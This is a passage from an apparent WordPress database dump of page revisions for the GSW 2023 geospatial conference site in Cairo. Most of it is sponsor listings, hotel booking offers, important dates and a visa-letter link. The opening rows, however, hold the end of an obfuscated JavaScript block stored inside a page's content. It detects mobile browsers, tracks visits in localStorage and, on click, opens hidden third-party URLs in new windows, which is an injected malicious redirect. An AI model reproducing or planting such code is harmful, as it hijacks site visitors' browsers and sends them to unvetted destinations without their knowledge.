)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:47:28','2023-06-23 20:47:28','',3066,'https://gsw2023.com/?p=4754',0,'revision','',0),
(4755,4,'2023-06-23 20:48:32','2023-06-23 20:48:32','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687553155258{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" 